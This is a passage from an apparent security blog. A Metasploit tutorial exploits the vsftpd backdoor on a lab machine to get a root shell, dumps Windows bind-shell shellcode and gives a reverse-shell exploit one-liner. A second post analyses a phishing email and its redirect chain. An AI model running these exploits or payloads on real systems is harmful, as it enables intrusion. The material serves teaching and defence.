   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution
</code></pre>
<p>Nice, the module <code>exploit/unix/ftp/vsftpd_234_backdoor</code> is what we need now.</p>
<h4 id="3.exploit">3. Exploit</h4>
<pre><code>msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.63.156   yes       The target address
   RPORT  21               yes       The target port

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic
</code></pre>
<p>There is only one payload available for this exploit, <code>cmd/unix/interact</code>, which means a command shell interaction is set up directly after exploitation.</p>
<p>Now we run it, and it succeeds:</p>
<pre><code>msf exploit(vsftpd_234_backdoor) > run
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.63.155:53640 -> 192.168.63.156:6200) at 2016-03-11 21:22:39 +0800
whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
</code></pre>
<h3 id="custompayload">Custom Payload</h3>
<p>In some cases, we may need custom payloads, like <a href="http://heron-note.blogspot.tw/2014/11/alphanumeric-shellcode-of-execbinsh.html">what I did for Secure Programming class in 2014</a>.</p>
<p>Pick a payload and generate its shellcode (using <code>payload/windows/shell_bind_tcp</code> as the example here):</p>
<pre><code>msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"
</code></pre>
<p>To keep specific bytes out of the shellcode (taking \x00 as the example):</p>
<pre><code>msf payload(shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xbf\x41\x3a\x72\xae\xda\xdf\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x78\x12\x03\x78\x12\x83\x81\x3e\x90\x5b\xfd" +
"\xd7\xd6\xa4\xfd\x27\xb7\x2d\x18\x16\xf7\x4a\x69\x09\xc7" +
"\x19\x3f\xa6\xac\x4c\xab\x3d\xc0\x58\xdc\xf6\x6f\xbf\xd3" +
"\x07\xc3\x83\x72\x84\x1e\xd0\x54\xb5\xd0\x25\x95\xf2\x0d" +
"\xc7\xc7\xab\x5a\x7a\xf7\xd8\x17\x47\x7c\x92\xb6\xcf\x61" +
"\x63\xb8\xfe\x34\xff\xe3\x20\xb7\x2c\x98\x68\xaf\x31\xa5" +
"\x23\x44\x81\x51\xb2\x8c\xdb\x9a\x19\xf1\xd3\x68\x63\x36" +
"\xd3\x92\x16\x4e\x27\x2e\x21\x95\x55\xf4\xa4\x0d\xfd\x7f" +
"\x1e\xe9\xff\xac\xf9\x7a\xf3\x19\x8d\x24\x10\x9f\x42\x5f" +
"\x2c\x14\x65\x8f\xa4\x6e\x42\x0b\xec\x35\xeb\x0a\x48\x9b" +
"\x14\x4c\x33\x44\xb1\x07\xde\x91\xc8\x4a\xb7\x56\xe1\x74" +
"\x47\xf1\x72\x07\x75\x5e\x29\x8f\x35\x17\xf7\x48\x39\x02" +
"\x4f\xc6\xc4\xad\xb0\xcf\x02\xf9\xe0\x67\xa2\x82\x6a\x77" +
"\x4b\x57\x06\x7f\xea\x08\x35\x82\x4c\xf9\xf9\x2c\x25\x13" +
"\xf6\x13\x55\x1c\xdc\x3c\xfe\xe1\xdf\x53\xa3\x6c\x39\x39" +
"\x4b\x39\x91\xd5\xa9\x1e\x2a\x42\xd1\x74\x02\xe4\x9a\x9e" +
"\x95\x0b\x1b\xb5\xb1\x9b\x90\xda\x05\xba\xa6\xf6\x2d\xab" +
"\x31\x8c\xbf\x9e\xa0\x91\x95\x48\x40\x03\x72\x88\x0f\x38" +
"\x2d\xdf\x58\x8e\x24\xb5\x74\xa9\x9e\xab\x84\x2f\xd8\x6f" +
"\x53\x8c\xe7\x6e\x16\xa8\xc3\x60\xee\x31\x48\xd4\xbe\x67" +
"\x06\x82\x78\xde\xe8\x7c\xd3\x8d\xa2\xe8\xa2\xfd\x74\x6e" +
"\xab\x2b\x03\x8e\x1a\x82\x52\xb1\x93\x42\x53\xca\xc9\xf2" +
"\x9c\x01\x4a\x02\xd7\x0b\xfb\x8b\xbe\xde\xb9\xd1\x40\x35" +
"\xfd\xef\xc2\xbf\x7e\x14\xda\xca\x7b\x50\x5c\x27\xf6\xc9" +
"\x09\x47\xa5\xea\x1b"
</code></pre>
<p>So we get a payload without \x00, which is understandably longer than the previous one.</p>
<p>We can also apply an encoder to the shellcode. To list all available encoders:</p>
<pre><code>msf payload(shell_bind_tcp) > show encoders

Encoders
========

   Name                   Disclosure Date  Rank       Description
   ----                   ---------------  ----       -----------
   cmd/echo                                good       Echo Command Encoder
   cmd/generic_sh                          manual     Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                 low        Generic ${IFS} Substitution Command Encoder
   cmd/perl                                normal     Perl Command Encoder
   cmd/powershell_base64                   excellent  Powershell Base64 Command Encoder
   cmd/printf_php_mq                       manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/eicar                           manual     The EICAR Encoder
   … (truncated)
</code></pre>
<p>Generate shellcode with a specific encoder:</p>
<pre><code>msf payload(shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# http://www.metasploit.com
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6a\x8b\xd7" +
"\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\xeb" +
"\xf1\xeb\x6f\xe8\xe2\xff\xff\xff\x17\x2b\x29\x29\x09\x31" +
"\x1a\x29\x24\x29\x31\x2f\x03\x33\x2a\x22\x32\x32\x06\x06" +
"\x23\x23\x15\x30\x23\x37\x1a\x22\x21\x2a\x21\x13\x13\x04" +
"\x08\x27\x13\x2f\x04\x27\x2b\x13\x10\x11\x22\x2b\x2b\x2b" +
"\x13\x13\x11\x25\x24\x13\x14\x24\x13\x24\x13\x07\x24\x13" +
"\x06\x0d\x2e\x1a\x13\x18\x0e\x17\x24\x24\x24\x11\x22\x25" +
"\x15\x37\x37\x37\x27\x2b\x25\x25\x25\x35\x25\x2d\x25\x25" +
"\x28\x25\x13\x02\x2d\x25\x35\x13\x25\x13\x06\x34\x09\x0c" +
"\x11\x28\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x7b" +
"\x8b\x7b\x30\x8b\x7b\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7" +
"\x7b\x26\x31\xff\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf2\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x8b\x7b" +
"\x11\x7b\xe3\x7b\x01\xd1\x7b\x8b\x7b\x20\x01\xd3\x8b\x7b" +
"\x18\xe3\x3a\x7b\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf" +
"\x0d\x01\xc7\x38\xe0\x7b\xf6\x03\x7d\xf8\x3b\x7d\x24\x7b" +
"\xe4\x7b\x8b\x7b\x24\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c" +
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b" +
"\x7b\x7b\x7b\xff\xe0\x5f\x5f\x7b\x8b\x12\xeb\x8d\x5d\x7b" +
"\x33\x32\x00\x00\x7b\x7b\x7b\x32\x5f\x7b\x7b\x7b\x7b\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x7b\x7b\x7b\x29" +
"\x80\x7b\x00\xff\xd5\x7b\x08\x7b\x7b\xe2\xfd\x40\x7b\x40" +
"\x7b\x7b\xea\x0f\xdf\xe0\xff\xd5\x97\x7b\x02\x00\x11\x5c" +
"\x89\xe6\x7b\x10\x7b\x7b\x7b\xc2\xdb\x37\x7b\xff\xd5\x7b" +
"\x7b\xb7\xe9\x38\xff\xff\xd5\x7b\x7b\x7b\xec\x3b\xe1\xff" +
"\xd5\x7b\x97\x7b\x7b\x7b\x7b\x7b\xff\xd5\x7b\x7b\x7b\x7b" +
"\x00\x89\xe3\x7b\x7b\x7b\x31\xf6\x7b\x12\x7b\x7b\xe2\xfd" +
"\x7b\xc7\x7b\x24\x3c\x01\x01\x8d\x7b\x24\x10\xc6\x00\x7b" +
"\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b" +
"\xcc\x3f\x86\xff\xd5\x89\xe0\x7b\x7b\x7b\xff\x30\x7b\x08" +
"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd" +
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b" +
"\x13\x7b\x7b\x7b\x00\x7b\xff\xd5"
</code></pre>
<p>or, all together:</p>
<pre><code>msf payload(shell_bind_tcp) > generate -b '\x00' -e x86/alpha_mixed -f output.txt
[*] Writing 3347 bytes to output.txt...
msf payload(shell_bind_tcp) > cat output.txt
[*] exec: cat output.txt
# windows/shell_bind_tcp - 718 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x89\xe5\xd9\xe5\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x79\x78\x4c\x42\x65\x50\x75\x50" +
"\x33\x30\x43\x50\x6b\x39\x5a\x45\x56\x51\x4f\x30\x75\x34" +
"\x4c\x4b\x50\x50\x64\x70\x6c\x4b\x70\x52\x66\x6c\x6c\x4b" +
"\x46\x32\x77\x64\x6e\x6b\x62\x52\x76\x48\x54\x4f\x68\x37" +
"\x70\x4a\x76\x46\x74\x71\x79\x6f\x4e\x4c\x67\x4c\x43\x51" +
"\x63\x4c\x63\x32\x34\x6c\x31\x30\x4b\x71\x58\x4f\x54\x4d" +
"\x53\x31\x48\x47\x6a\x42\x78\x72\x72\x72\x31\x47\x6e\x6b" +
"\x36\x32\x74\x50\x6c\x4b\x50\x4a\x75\x6c\x4c\x4b\x50\x4c" +
"\x42\x31\x63\x48\x68\x63\x52\x68\x76\x61\x6a\x71\x50\x51" +
"\x6e\x6b\x50\x59\x71\x30\x36\x61\x6a\x73\x6e\x6b\x73\x79" +
"\x64\x58\x6b\x53\x56\x5a\x47\x39\x6c\x4b\x35\x64\x6e\x6b" +
"\x55\x51\x39\x46\x75\x61\x4b\x4f\x4e\x4c\x6f\x31\x38\x4f" +
"\x66\x6d\x43\x31\x49\x57\x45\x68\x49\x70\x74\x35\x4c\x36" +
"\x54\x43\x73\x4d\x39\x68\x67\x4b\x33\x4d\x46\x44\x70\x75" +
"\x48\x64\x76\x38\x6c\x4b\x53\x68\x67\x54\x45\x51\x78\x53" +
"\x62\x46\x6e\x6b\x74\x4c\x72\x6b\x6e\x6b\x56\x38\x65\x4c" +
"\x36\x61\x58\x53\x4e\x6b\x46\x64\x6e\x6b\x65\x51\x4e\x30" +
"\x6c\x49\x32\x64\x75\x74\x47\x54\x51\x4b\x53\x6b\x61\x71" +
"\x63\x69\x31\x4a\x36\x31\x59\x6f\x6b\x50\x63\x6f\x53\x6f" +
"\x73\x6a\x6c\x4b\x32\x32\x6a\x4b\x6c\x4d\x71\x4d\x51\x78" +
"\x37\x43\x65\x62\x73\x30\x45\x50\x32\x48\x53\x47\x44\x33" +
"\x56\x52\x51\x4f\x70\x54\x71\x78\x50\x4c\x30\x77\x74\x66" +
"\x67\x77\x6b\x4f\x4e\x35\x4c\x78\x5a\x30\x65\x51\x37\x70" +
"\x37\x70\x51\x39\x4f\x34\x51\x44\x70\x50\x30\x68\x75\x79" +
"\x6b\x30\x72\x4b\x37\x70\x6b\x4f\x4e\x35\x63\x5a\x77\x78" +
"\x31\x49\x32\x70\x48\x62\x6b\x4d\x77\x30\x42\x70\x61\x50" +
"\x56\x30\x65\x38\x69\x7a\x66\x6f\x79\x4f\x69\x70\x39\x6f" +
"\x39\x45\x6e\x77\x52\x48\x67\x72\x67\x70\x44\x51\x43\x6c" +
"\x4e\x69\x6b\x56\x63\x5a\x54\x50\x32\x76\x71\x47\x31\x78" +
"\x4f\x32\x49\x4b\x37\x47\x32\x47\x69\x6f\x78\x55\x36\x37" +
"\x71\x78\x4d\x67\x5a\x49\x46\x58\x4b\x4f\x4b\x4f\x6a\x75" +
"\x50\x57\x45\x38\x74\x34\x7a\x4c\x65\x6b\x59\x71\x6b\x4f" +
"\x68\x55\x52\x77\x4a\x37\x63\x58\x43\x45\x62\x4e\x32\x6d" +
"\x31\x71\x79\x6f\x79\x45\x30\x68\x71\x73\x62\x4d\x62\x44" +
"\x43\x30\x6e\x69\x59\x73\x52\x77\x66\x37\x30\x57\x66\x51" +
"\x4b\x46\x63\x5a\x62\x32\x63\x69\x70\x56\x6b\x52\x39\x6d" +
"\x63\x56\x6f\x37\x73\x74\x55\x74\x77\x4c\x57\x71\x56\x61" +
"\x4c\x4d\x53\x74\x44\x64\x62\x30\x6a\x66\x37\x70\x51\x54" +
"\x42\x74\x52\x70\x61\x46\x66\x36\x70\x56\x71\x56\x43\x66" +
"\x32\x6e\x63\x66\x70\x56\x31\x43\x72\x76\x33\x58\x31\x69" +
"\x68\x4c\x75\x6f\x4c\x46\x69\x6f\x4e\x35\x4f\x79\x39\x70" +
"\x52\x6e\x70\x56\x77\x36\x6b\x4f\x30\x30\x61\x78\x53\x38" +
"\x4b\x37\x57\x6d\x33\x50\x39\x6f\x38\x55\x4f\x4b\x68\x70" +
"\x6d\x65\x6d\x72\x51\x46\x50\x68\x59\x36\x6e\x75\x4f\x4d" +
"\x6f\x6d\x6b\x4f\x38\x55\x67\x4c\x47\x76\x73\x4c\x46\x6a" +
"\x4d\x50\x6b\x4b\x49\x70\x74\x35\x34\x45\x4d\x6b\x57\x37" +
"\x76\x73\x74\x32\x32\x4f\x33\x5a\x55\x50\x36\x33\x79\x6f" +
"\x6a\x75\x41\x41"
</code></pre>
<h3 id="scripting">Scripting</h3>
<p>The Metasploit framework lets users write scripts to drive the process. There are three ways to run one:</p>
<ol>
<li><pre><code>> msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"
</code></pre></li>
<li><pre><code>> msfconsole -r my_script.rc
</code></pre></li>
<li><p>(in msfconsole)</p>
<pre><code>msf > resource my_script.rc
</code></pre></li>
</ol>
<h3 id="database">Database</h3>
<p>When conducting a penetration test, it is frequently a challenge to keep track of everything you have done to the target network. This is where having a database configured can be a great timesaver. Metasploit has built-in support for the PostgreSQL database system. (<a href="https://www.offensive-security.com/metasploit-unleashed/database-introduction/">Reference</a>)</p>
<p>Here are some helpful commands:</p>
<ul>
<li><code>help database</code></li>
<li><code>hosts</code></li>
<li><code>services</code></li>
<li><code>db_nmap</code>: same as nmap, but the results are saved into the current database</li>
<li><code>db_import</code></li>
<li><code>db_export -f xml [filepath for xml]</code></li>
</ul>
<h3 id="conclusion">Conclusion</h3>
<p>Metasploit is a powerful tool that lets people carry out attacks with the aid of its exploit database. Although this post only covers the basic usage of Metasploit with one example, which hardly conveys its strength, I will keep updating it if I find anything new and worth sharing.</p>
<h2 id="phishingemail">Phishing Email</h2>
<p>Heron Yang, 2016-02-12</p>
I got an email today that looked like spam. However, Google did not mark it as spam, which it usually does, so I took a short note on understanding this email.<h3>
Email</h3>
<div>
Instead of using super attractive words, the content said that I had to log in somewhere in order to get my mail back. However, I checked the sender's domain, "hawaiiantel.net", and I am sure I have never used any service from them. More generally, we cannot fully trust that spam will not come from domains that "look safe"; even if the mail appears to come from someone we know, we still have to be careful.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfFTkwde4DUMXgAk2kedKbiqInBdPIUxsMsHm8A-Y16canSB9PTTfcc_7DEpFx5aXChyPAV_htqDK4lJtAxY0WWAxOTdTWBWkCBxMcTDLq3nHX7Qt5MiwJEnLxmJ0KiW3rRqjwNFIz5Tae/s1600/Screen+Shot+2016-02-12+at+2.04.42+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfFTkwde4DUMXgAk2kedKbiqInBdPIUxsMsHm8A-Y16canSB9PTTfcc_7DEpFx5aXChyPAV_htqDK4lJtAxY0WWAxOTdTWBWkCBxMcTDLq3nHX7Qt5MiwJEnLxmJ0KiW3rRqjwNFIz5Tae/s640/Screen+Shot+2016-02-12+at+2.04.42+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<h3>
External Link</h3>
<div>
Don't click on the link if we don't trust it at this point. Copy the link and read it in order to understand who is hosting it. What I got is "http://ow.ly/YeNWT", which looks like a shortened URL hiding the real one. Legitimate senders rarely do this, since there is no benefit in this case; it is always better to use URLs under the company's own domain so that people can trust them.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx1k22iHPDLlVGXQgf6l6aZB3J8wV54QyaSN2rG7_c8r4bMTyEozr_xq8Z0tZSoUfp5rB0vKkn_0Jt5nffLzZfC-HX2sNE3Gp5SkF3Iu8zKhMaEq4azWdbCTTufWp6tgXH7DgU_F9MtgH9/s1600/Screen+Shot+2016-02-12+at+1.58.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx1k22iHPDLlVGXQgf6l6aZB3J8wV54QyaSN2rG7_c8r4bMTyEozr_xq8Z0tZSoUfp5rB0vKkn_0Jt5nffLzZfC-HX2sNE3Gp5SkF3Iu8zKhMaEq4azWdbCTTufWp6tgXH7DgU_F9MtgH9/s640/Screen+Shot+2016-02-12+at+1.58.07+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
So, instead of using my everyday browser, which holds my cookies for many different websites, I used the "<a href="https://www.torproject.org/projects/torbrowser.html.en">Tor Browser</a>" to keep myself safe.</div>
<div>
<br /></div>
<h3>
Analysing the Site - Routing</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Fw4d5Co_L6W-eSPMISaR4DbvzUGblZceyW4RTm78c9wbtyc9Z-z8XErhotmC6Qm2Rn2T9ObQNU_tsU2w66-FNm_bpWQrYfjZr74dUvYZFQD4Clxd5nxu5BAP0L0Ha6dR0ztrIPBBfk5_/s1600/Screen+Shot+2016-02-12+at+1.58.43+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Fw4d5Co_L6W-eSPMISaR4DbvzUGblZceyW4RTm78c9wbtyc9Z-z8XErhotmC6Qm2Rn2T9ObQNU_tsU2w66-FNm_bpWQrYfjZr74dUvYZFQD4Clxd5nxu5BAP0L0Ha6dR0ztrIPBBfk5_/s640/Screen+Shot+2016-02-12+at+1.58.43+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
After seeing the page in Tor Browser, it is almost 100% certain that this is a phishing site. However, to understand it better, we can trace how its URL redirection works using the following information:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
> wget http://ow.ly/YeNWT<br />--2016-02-12 14:17:58-- http://ow.ly/YeNWT<br />Resolving ow.ly (ow.ly)... 54.67.120.65, 54.183.130.144, 54.183.131.91, ...<br />Connecting to ow.ly (ow.ly)|54.67.120.65|:80... connected.<br />HTTP request sent, awaiting response... 301 Moved Permanently<br />Location: http://hannahreade.co.uk/WT/orin.htm [following]<br />--2016-02-12 14:17:59-- http://hannahreade.co.uk/WT/orin.htm<br />Resolving hannahreade.co.uk (hannahreade.co.uk)... 50.115.112.7<br />Connecting to hannahreade.co.uk (hannahreade.co.uk)|50.115.112.7|:80... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 102999 (101K) [text/html]</blockquote>
</div>
<div>
By requesting "http://ow.ly/YeNWT", I was redirected to "http://hannahreade.co.uk/WT/orin.htm". "hannahreade.co.uk" looks like an ordinary website; if so, the site has probably been compromised.</div>
<div>
<br /></div>
<h3>
Analysing the Site - Purpose</h3>
<div>
Like most phishing websites, the purpose of this site is to collect users' account names and passwords by imitating a real site. The page looks exactly like the Google login page; however, nothing besides the layout is actually the same. We can tell this simply by reading the URL, or by typing a wrong password and seeing what happens.</div>
<div>
<br /></div>
<div>
In this case, I could log in without typing a correct password. Its second page then asked for my cell phone number, and of course I could move on to the next page by giving any number (even in a wrong phone number format). After I had given all this information, the site showed a blank page, which is the usual pattern. The user may just be confused and ignore it without thinking too much, while the account username and password have already been sent to the attacker.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXr6r8jUhRYuYkCCa8x_b4fs9CEUxz1zYQd8PLc9xZaf5KpuZdGnDYbwiHC07Im_B8CFLhVGT8nEXPPDPJ0dBUMYb-k5ZGH2iGF0AVaeCWooXazDg9ddmg3guUoyj_cppXkspuYNf17KZ9/s1600/Screen+Shot+2016-02-12+at+1.59.23+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXr6r8jUhRYuYkCCa8x_b4fs9CEUxz1zYQd8PLc9xZaf5KpuZdGnDYbwiHC07Im_B8CFLhVGT8nEXPPDPJ0dBUMYb-k5ZGH2iGF0AVaeCWooXazDg9ddmg3guUoyj_cppXkspuYNf17KZ9/s640/Screen+Shot+2016-02-12+at+1.59.23+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<h3>
Analysis of the Site - Code</h3>
<div>
That's pretty much it so far; however, it is still worth going through their code a little. After I fetched the phishing site with "wget", I had the raw HTML file of the site. This is its second line:</div>
<div>
<br /></div>
<blockquote class="tr_bq">
&lt;meta http-equiv="Refresh" content="1; url=data:text/html;base64, 77u/IA0KPC...</blockquote>
<div>
<br /></div>
<div>
The page redirects to another URL, "data:text/html;base64, ....", which isn't a hyperlink to another site but a data URL that carries the whole page inside itself as a base64 string. When the browser opens that URL, it decodes the string back into HTML and renders it.</div>
<div>
<br /></div>
<div>
However, part of the code was <a href="http://stackoverflow.com/questions/21762076/why-does-gmail-use-eval">encoded JS</a>, which hides further information.</div>
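<div>
To see what such a redirect actually carries without rendering it in a browser, here is an added Python example (not code from the original post): it pulls the target out of a meta refresh tag, decodes the data: URL, and reports the form actions and the eval()/password-field indicators found in the inlined page. The sample page is constructed here to match the shape of the tag quoted above (its base64 body starts with the same "77u/IA0K" prefix, a UTF-8 BOM followed by a space and a newline); the collector.example form action and the helper names are my own.</div>

```python
import base64
import html
import re
import urllib.parse

# Constructed sample (not the real page) modelled on the line quoted in the post: a
# <meta http-equiv="Refresh"> that sends the browser to a data: URL whose base64
# body is the actual page. The inlined page is a harmless stand-in containing the
# kind of things such a page has: a password form and an eval()-wrapped script.
_INLINED_PAGE = (
    "\ufeff \r\n<html><body>"
    "<form action='http://collector.example/post' method='post'>"
    "<input name='Email'><input name='Passwd' type='password'></form>"
    "<script>eval(unescape('%61%6c%65%72%74%28%31%29'))</script>"
    "</body></html>"
)
SAMPLE_PAGE = (
    "<html><head>\n"
    '<meta http-equiv="Refresh" content="1; url=data:text/html;base64, '
    + base64.b64encode(_INLINED_PAGE.encode("utf-8")).decode("ascii")
    + '">\n</head><body></body></html>'
)

# Minimal matcher for the refresh tag; enough for the shape seen on the page.
_META_REFRESH = re.compile(
    r'<meta\s+http-equiv\s*=\s*["\']?refresh["\']?\s+content\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE,
)


def extract_refresh_target(page):
    """Return the URL a <meta http-equiv="Refresh"> would send the browser to, or None."""
    m = _META_REFRESH.search(page)
    if not m:
        return None
    content = html.unescape(m.group(1))        # "1; url=data:..." (delay; url=target)
    _delay, sep, target = content.partition(";")
    if not sep:
        return None
    target = target.strip()
    if target.lower().startswith("url="):
        target = target[4:].strip()
    return target or None


def decode_data_url(url):
    """Decode a data: URL into (media_type, body_bytes); handles base64 and percent-encoded bodies."""
    if not url.lower().startswith("data:"):
        raise ValueError("not a data: URL")
    header, _, body = url[5:].partition(",")
    params = [p.strip().lower() for p in header.split(";")]
    media_type = params[0] or "text/plain"
    if "base64" in params[1:]:
        body = "".join(body.split())           # the quoted tag has a space after the comma
        raw = base64.b64decode(body + "=" * (-len(body) % 4))
    else:
        raw = urllib.parse.unquote_to_bytes(body)
    return media_type, raw


# Indicators worth flagging in a decoded landing page: (needle, label)
_INDICATORS = (
    ("eval(", "eval() of packed or obfuscated script"),
    ("unescape(", "unescape()-encoded script"),
    ("type='password'", "password field"),
    ('type="password"', "password field"),
)


def analyse_page(page):
    """Follow one meta-refresh hop into a data: URL and report what the inlined page contains."""
    target = extract_refresh_target(page)
    report = {"refresh_target": target, "inlined": False, "form_actions": [], "indicators": []}
    if target is None or not target.lower().startswith("data:"):
        return report
    media_type, raw = decode_data_url(target)
    text = raw.decode("utf-8", errors="replace").lstrip("\ufeff")
    report["inlined"] = True
    report["media_type"] = media_type
    # where anything typed into the page's forms would be posted
    report["form_actions"] = re.findall(r"<form[^>]*\baction=['\"]([^'\"]+)", text, re.IGNORECASE)
    report["indicators"] = sorted({label for needle, label in _INDICATORS if needle in text})
    return report
```

<div>
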